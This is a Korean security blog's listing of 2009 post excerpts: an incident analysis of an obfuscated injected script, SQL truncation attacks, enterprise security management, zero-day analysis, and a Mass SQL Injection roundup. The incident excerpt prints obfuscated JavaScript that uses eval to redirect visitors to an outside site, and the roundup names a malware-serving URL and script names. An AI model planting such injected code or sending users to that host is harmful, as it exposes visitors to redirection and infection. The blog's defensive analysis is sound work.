본문 바로가기

정보보호 (Security)368

해외에서 삽입한 악성코드 아닌 광고코드 분석 관리중인 모 사이트에 아래와 같은 악성코드는 아닌 광고코드가 삽입되었으며, 침해 분석 결과 해외 아이피로 확인되었음. 일단 침해된 방법에 대해서는 차단하였으나 추가적인 시도 가능성 모니터링 필요. -- 삽입코드 -- 정상 코드로 변환하여.. -- 원형 코드 -- 추가 다운로드 코드 (bidch.js) -- que 입력값 : test -- 소스 코드 -- function f(str) { z="ion='"; d="win"; c="cat"; f7=str; b="dow.lo"; g="';"; i=7; j=21; if (j-14==i) eval(d+b+c+z+f7+g); } f('http://bestforyou.if.ua/feed/search.php?q=test'); -- 원형 코드 -- window.locati.. 2009. 3. 3.
새로운 SQL 잘라내기 공격 및 대처 방법 2006년 http://msdn.microsoft.com/ko-kr/magazine/cc163523.aspx 2008년 http://www.dbguide.net/know/know109001.jsp SQL 주입을 이용하는 공격은 방화벽과 침입 검색 시스템을 통과해서 데이터 계층을 손상시킬 수 있다는 점 때문에 많은 관심을 끌었습니다. 기본 코드 패턴을 보면 1차 또는 2차 주입 모두 문을 생성할 때 신뢰할 수 없는 데이터를 사용한 경우에 발생하는 다른 주입 문제와 비슷합니다. 대부분의 개발자는 백 엔드에서 매개 변수가 있는 SQL 쿼리를 저장 프로시저와 함께 사용하여 웹 프런트 엔드의 취약점을 완화하고 있지만, 사용자 입력 기반의 DDL(데이터 정의 언어) 문을 생성하는 경우 또는 C/C++로 작성된 응용.. 2009. 3. 2.
통합보안관리시스템 - ESM (Enterprise Security Management) EMS란 방화벽, 침입탐지시스템(IDS), 가상시설망(VPN) 등 다양한 종류의 보안 솔루션을 하나로 모은 통합보안관리시스템이다. ESM은 최근 통합관리 수준에서 벗어나 시스템자원관리(SMS), 네트워크자원관리(NMS) 등 전사적 자원관리시스템까지 포함하는 형태로 개발되는 추세여서 ESM이 상용화되면 기업들은 다른 기종의 보안 솔루션들을 설치하면서 중복투자를 하거나 자원을 낭비하는 것을 막을 수 있다. 그리고 또 하나,솔루션간 상호 연동을 통해 전체 정보통신 시스템에 대한 보안 정책도 수립할 수 있다는 점이 ESM가 주목받는 이유중의 하나이다. 현재 세계적으로 ESM 시장은 몇몇 업체를 제외하곤 상용화된 제품이 거의 없을 정도로 아직 개발 단계에 불과하며 체크포인트, ISS 등 주요 보안솔루션 업체들이 .. 2009. 3. 2.
Ms Word / Internet Explorer 제로데이 공격분석 최신의 보안패치를 적용하고, 보안 프로그램들을 최신 버전으로 유지하더라도 웹 서핑을 하는 것만으로도 PC에 트로잔이 설치될 수가 있다. 바로 제로데이 취약점을 이용한 공격으로 가능한 일이다. 이 연재는 제로데이에 대한 정확한 이해와 분석을 통해 제로데이 공격을 어떻게 예방할 수 있는지에 대해 알아보는데 목적이 있다. 이번호에서는 제로데이 공격에 대해 직접 확인하고, 분석하는 방법에 대해서 알아보며, 최근에 발생되었던 제로데이 공격을 분석해 제로데이 공격에 대한 이해를 높이도록 한다. 최근의 표적형 제로데이 공격들의 경우 대중에 많이 알려진 공격들이 아니기 때문에, 분석을 위해서는 공격에 대한 샘플 확보와 정보수집이 무엇보다도 중요하다. 샘플 확보의 경우, 일반인들이 쉽게 공격 샘플을 확보할만한 방법이 뚜.. 2009. 2. 28.
Mass SQL Injection 대한 자료 모음 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. 현재 악성코드의 name별로 꾸준히 찾아서 포스팅하려고 했으나, 이게 엄청나게 많군요. |g.js| |m.js| |4.js| |3.js| |2.js| |1.js| |ip.js| |jp.js| |fuckjp.js| |fjp.js| |a.js| |ads.js| js 확장자로 만 이루어 진게 대략 이정도 이군요. 또한, 계속 파일명이 바뀌고 있습니다. Google의 도움을 빌어 "약 1,250,000개 결과(한국어 적용시 약 60,500개)"를 얻을 수 있습니다. 악성코드 출처는 대략 아래와 같습니다. (Google에서 확인) http://www.killwow1.cn/g.js (약 1,.. 2009. 2. 27.
728x90